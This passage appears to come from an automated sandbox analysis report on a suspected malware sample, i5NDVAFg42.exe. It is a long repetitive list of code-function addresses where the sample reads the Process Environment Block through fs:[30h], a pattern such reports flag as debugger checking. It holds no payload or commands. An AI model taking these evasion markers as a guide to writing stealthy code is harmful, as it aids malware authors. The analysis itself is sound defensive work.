              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01830274 mov eax, dword ptr fs:[00000030h]0_2_01830274
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE284 mov eax, dword ptr fs:[00000030h]0_2_017BE284
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE284 mov eax, dword ptr fs:[00000030h]0_2_017BE284
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B656A mov eax, dword ptr fs:[00000030h]0_2_017B656A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B656A mov eax, dword ptr fs:[00000030h]0_2_017B656A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B656A mov eax, dword ptr fs:[00000030h]0_2_017B656A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018005A7 mov eax, dword ptr fs:[00000030h]0_2_018005A7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018005A7 mov eax, dword ptr fs:[00000030h]0_2_018005A7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018005A7 mov eax, dword ptr fs:[00000030h]0_2_018005A7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788550 mov eax, dword ptr fs:[00000030h]0_2_01788550
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788550 mov eax, dword ptr fs:[00000030h]0_2_01788550
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE53E mov eax, dword ptr fs:[00000030h]0_2_017AE53E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE53E mov eax, dword ptr fs:[00000030h]0_2_017AE53E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE53E mov eax, dword ptr fs:[00000030h]0_2_017AE53E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE53E mov eax, dword ptr fs:[00000030h]0_2_017AE53E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE53E mov eax, dword ptr fs:[00000030h]0_2_017AE53E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790535 mov eax, dword ptr fs:[00000030h]0_2_01790535
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790535 mov eax, dword ptr fs:[00000030h]0_2_01790535
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790535 mov eax, dword ptr fs:[00000030h]0_2_01790535
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790535 mov eax, dword ptr fs:[00000030h]0_2_01790535
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790535 mov eax, dword ptr fs:[00000030h]0_2_01790535
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790535 mov eax, dword ptr fs:[00000030h]0_2_01790535
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01816500 mov eax, dword ptr fs:[00000030h]0_2_01816500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854500 mov eax, dword ptr fs:[00000030h]0_2_01854500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854500 mov eax, dword ptr fs:[00000030h]0_2_01854500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854500 mov eax, dword ptr fs:[00000030h]0_2_01854500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854500 mov eax, dword ptr fs:[00000030h]0_2_01854500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854500 mov eax, dword ptr fs:[00000030h]0_2_01854500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854500 mov eax, dword ptr fs:[00000030h]0_2_01854500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01854500 mov eax, dword ptr fs:[00000030h]0_2_01854500
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BC5ED mov eax, dword ptr fs:[00000030h]0_2_017BC5ED
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BC5ED mov eax, dword ptr fs:[00000030h]0_2_017BC5ED
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017825E0 mov eax, dword ptr fs:[00000030h]0_2_017825E0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AE5E7 mov eax, dword ptr fs:[00000030h]0_2_017AE5E7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017865D0 mov eax, dword ptr fs:[00000030h]0_2_017865D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA5D0 mov eax, dword ptr fs:[00000030h]0_2_017BA5D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA5D0 mov eax, dword ptr fs:[00000030h]0_2_017BA5D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE5CF mov eax, dword ptr fs:[00000030h]0_2_017BE5CF
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE5CF mov eax, dword ptr fs:[00000030h]0_2_017BE5CF
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A45B1 mov eax, dword ptr fs:[00000030h]0_2_017A45B1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A45B1 mov eax, dword ptr fs:[00000030h]0_2_017A45B1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE59C mov eax, dword ptr fs:[00000030h]0_2_017BE59C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B4588 mov eax, dword ptr fs:[00000030h]0_2_017B4588
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01782582 mov eax, dword ptr fs:[00000030h]0_2_01782582
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01782582 mov ecx, dword ptr fs:[00000030h]0_2_01782582
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AA470 mov eax, dword ptr fs:[00000030h]0_2_017AA470
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AA470 mov eax, dword ptr fs:[00000030h]0_2_017AA470
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017AA470 mov eax, dword ptr fs:[00000030h]0_2_017AA470
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A245A mov eax, dword ptr fs:[00000030h]0_2_017A245A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177645D mov eax, dword ptr fs:[00000030h]0_2_0177645D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180A4B0 mov eax, dword ptr fs:[00000030h]0_2_0180A4B0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BE443 mov eax, dword ptr fs:[00000030h]0_2_017BE443
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA430 mov eax, dword ptr fs:[00000030h]0_2_017BA430
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177C427 mov eax, dword ptr fs:[00000030h]0_2_0177C427
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177E420 mov eax, dword ptr fs:[00000030h]0_2_0177E420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177E420 mov eax, dword ptr fs:[00000030h]0_2_0177E420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0177E420 mov eax, dword ptr fs:[00000030h]0_2_0177E420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B8402 mov eax, dword ptr fs:[00000030h]0_2_017B8402
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B8402 mov eax, dword ptr fs:[00000030h]0_2_017B8402
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B8402 mov eax, dword ptr fs:[00000030h]0_2_017B8402
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017804E5 mov ecx, dword ptr fs:[00000030h]0_2_017804E5
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806420 mov eax, dword ptr fs:[00000030h]0_2_01806420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806420 mov eax, dword ptr fs:[00000030h]0_2_01806420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806420 mov eax, dword ptr fs:[00000030h]0_2_01806420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806420 mov eax, dword ptr fs:[00000030h]0_2_01806420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806420 mov eax, dword ptr fs:[00000030h]0_2_01806420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806420 mov eax, dword ptr fs:[00000030h]0_2_01806420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01806420 mov eax, dword ptr fs:[00000030h]0_2_01806420
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B44B0 mov ecx, dword ptr fs:[00000030h]0_2_017B44B0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017864AB mov eax, dword ptr fs:[00000030h]0_2_017864AB
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180C460 mov ecx, dword ptr fs:[00000030h]0_2_0180C460
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01788770 mov eax, dword ptr fs:[00000030h]0_2_01788770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01790770 mov eax, dword ptr fs:[00000030h]0_2_01790770
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0182678E mov eax, dword ptr fs:[00000030h]0_2_0182678E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018347A0 mov eax, dword ptr fs:[00000030h]0_2_018347A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01780750 mov eax, dword ptr fs:[00000030h]0_2_01780750
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2750 mov eax, dword ptr fs:[00000030h]0_2_017C2750
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2750 mov eax, dword ptr fs:[00000030h]0_2_017C2750
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B674D mov esi, dword ptr fs:[00000030h]0_2_017B674D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B674D mov eax, dword ptr fs:[00000030h]0_2_017B674D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B674D mov eax, dword ptr fs:[00000030h]0_2_017B674D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018007C3 mov eax, dword ptr fs:[00000030h]0_2_018007C3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B273C mov eax, dword ptr fs:[00000030h]0_2_017B273C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B273C mov ecx, dword ptr fs:[00000030h]0_2_017B273C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B273C mov eax, dword ptr fs:[00000030h]0_2_017B273C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FC730 mov eax, dword ptr fs:[00000030h]0_2_017FC730
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BC720 mov eax, dword ptr fs:[00000030h]0_2_017BC720
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BC720 mov eax, dword ptr fs:[00000030h]0_2_017BC720
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180E7E1 mov eax, dword ptr fs:[00000030h]0_2_0180E7E1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01780710 mov eax, dword ptr fs:[00000030h]0_2_01780710
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B0710 mov eax, dword ptr fs:[00000030h]0_2_017B0710
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BC700 mov eax, dword ptr fs:[00000030h]0_2_017BC700
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017847FB mov eax, dword ptr fs:[00000030h]0_2_017847FB
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017847FB mov eax, dword ptr fs:[00000030h]0_2_017847FB
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A27ED mov eax, dword ptr fs:[00000030h]0_2_017A27ED
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A27ED mov eax, dword ptr fs:[00000030h]0_2_017A27ED
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A27ED mov eax, dword ptr fs:[00000030h]0_2_017A27ED
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178C7C0 mov eax, dword ptr fs:[00000030h]0_2_0178C7C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01804755 mov eax, dword ptr fs:[00000030h]0_2_01804755
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017807AF mov eax, dword ptr fs:[00000030h]0_2_017807AF
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180E75D mov eax, dword ptr fs:[00000030h]0_2_0180E75D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B2674 mov eax, dword ptr fs:[00000030h]0_2_017B2674
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA660 mov eax, dword ptr fs:[00000030h]0_2_017BA660
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA660 mov eax, dword ptr fs:[00000030h]0_2_017BA660
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179C640 mov eax, dword ptr fs:[00000030h]0_2_0179C640
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178262C mov eax, dword ptr fs:[00000030h]0_2_0178262C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B8620 mov eax, dword ptr fs:[00000030h]0_2_017B8620
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B6620 mov eax, dword ptr fs:[00000030h]0_2_017B6620
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179E627 mov eax, dword ptr fs:[00000030h]0_2_0179E627
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C2619 mov eax, dword ptr fs:[00000030h]0_2_017C2619
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018006F1 mov eax, dword ptr fs:[00000030h]0_2_018006F1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018006F1 mov eax, dword ptr fs:[00000030h]0_2_018006F1
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179260B mov eax, dword ptr fs:[00000030h]0_2_0179260B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179260B mov eax, dword ptr fs:[00000030h]0_2_0179260B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179260B mov eax, dword ptr fs:[00000030h]0_2_0179260B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179260B mov eax, dword ptr fs:[00000030h]0_2_0179260B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179260B mov eax, dword ptr fs:[00000030h]0_2_0179260B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179260B mov eax, dword ptr fs:[00000030h]0_2_0179260B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0179260B mov eax, dword ptr fs:[00000030h]0_2_0179260B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FE609 mov eax, dword ptr fs:[00000030h]0_2_017FE609
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FE6F2 mov eax, dword ptr fs:[00000030h]0_2_017FE6F2
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FE6F2 mov eax, dword ptr fs:[00000030h]0_2_017FE6F2
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FE6F2 mov eax, dword ptr fs:[00000030h]0_2_017FE6F2
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FE6F2 mov eax, dword ptr fs:[00000030h]0_2_017FE6F2
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA6C7 mov ebx, dword ptr fs:[00000030h]0_2_017BA6C7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BA6C7 mov eax, dword ptr fs:[00000030h]0_2_017BA6C7
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B66B0 mov eax, dword ptr fs:[00000030h]0_2_017B66B0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017BC6A6 mov eax, dword ptr fs:[00000030h]0_2_017BC6A6
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01784690 mov eax, dword ptr fs:[00000030h]0_2_01784690
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01784690 mov eax, dword ptr fs:[00000030h]0_2_01784690
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184866E mov eax, dword ptr fs:[00000030h]0_2_0184866E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184866E mov eax, dword ptr fs:[00000030h]0_2_0184866E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C096E mov eax, dword ptr fs:[00000030h]0_2_017C096E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C096E mov edx, dword ptr fs:[00000030h]0_2_017C096E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017C096E mov eax, dword ptr fs:[00000030h]0_2_017C096E
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A6962 mov eax, dword ptr fs:[00000030h]0_2_017A6962
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A6962 mov eax, dword ptr fs:[00000030h]0_2_017A6962
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017A6962 mov eax, dword ptr fs:[00000030h]0_2_017A6962
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018089B3 mov esi, dword ptr fs:[00000030h]0_2_018089B3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018089B3 mov eax, dword ptr fs:[00000030h]0_2_018089B3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018089B3 mov eax, dword ptr fs:[00000030h]0_2_018089B3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_018169C0 mov eax, dword ptr fs:[00000030h]0_2_018169C0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0184A9D3 mov eax, dword ptr fs:[00000030h]0_2_0184A9D3
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180E9E0 mov eax, dword ptr fs:[00000030h]0_2_0180E9E0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01778918 mov eax, dword ptr fs:[00000030h]0_2_01778918
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01778918 mov eax, dword ptr fs:[00000030h]0_2_01778918
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FE908 mov eax, dword ptr fs:[00000030h]0_2_017FE908
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017FE908 mov eax, dword ptr fs:[00000030h]0_2_017FE908
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B29F9 mov eax, dword ptr fs:[00000030h]0_2_017B29F9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B29F9 mov eax, dword ptr fs:[00000030h]0_2_017B29F9
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180C912 mov eax, dword ptr fs:[00000030h]0_2_0180C912
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A9D0 mov eax, dword ptr fs:[00000030h]0_2_0178A9D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A9D0 mov eax, dword ptr fs:[00000030h]0_2_0178A9D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A9D0 mov eax, dword ptr fs:[00000030h]0_2_0178A9D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A9D0 mov eax, dword ptr fs:[00000030h]0_2_0178A9D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A9D0 mov eax, dword ptr fs:[00000030h]0_2_0178A9D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0178A9D0 mov eax, dword ptr fs:[00000030h]0_2_0178A9D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180892A mov eax, dword ptr fs:[00000030h]0_2_0180892A
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0181892B mov eax, dword ptr fs:[00000030h]0_2_0181892B
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017B49D0 mov eax, dword ptr fs:[00000030h]0_2_017B49D0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01800946 mov eax, dword ptr fs:[00000030h]0_2_01800946
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017809AD mov eax, dword ptr fs:[00000030h]0_2_017809AD
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017809AD mov eax, dword ptr fs:[00000030h]0_2_017809AD
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017929A0 mov eax, dword ptr fs:[00000030h]0_2_017929A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017929A0 mov eax, dword ptr fs:[00000030h]0_2_017929A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017929A0 mov eax, dword ptr fs:[00000030h]0_2_017929A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017929A0 mov eax, dword ptr fs:[00000030h]0_2_017929A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017929A0 mov eax, dword ptr fs:[00000030h]0_2_017929A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017929A0 mov eax, dword ptr fs:[00000030h]0_2_017929A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017929A0 mov eax, dword ptr fs:[00000030h]0_2_017929A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017929A0 mov eax, dword ptr fs:[00000030h]0_2_017929A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017929A0 mov eax, dword ptr fs:[00000030h]0_2_017929A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017929A0 mov eax, dword ptr fs:[00000030h]0_2_017929A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017929A0 mov eax, dword ptr fs:[00000030h]0_2_017929A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017929A0 mov eax, dword ptr fs:[00000030h]0_2_017929A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_017929A0 mov eax, dword ptr fs:[00000030h]0_2_017929A0
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01824978 mov eax, dword ptr fs:[00000030h]0_2_01824978
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01824978 mov eax, dword ptr fs:[00000030h]0_2_01824978
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180C97C mov eax, dword ptr fs:[00000030h]0_2_0180C97C
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_0180C89D mov eax, dword ptr fs:[00000030h]0_2_0180C89D
              Source: C:\Users\user\Desktop\i5NDVAFg42.exeCode function: 0_2_01784859 mov eax, dword ptr fs:[00000030h]0_2_01784859
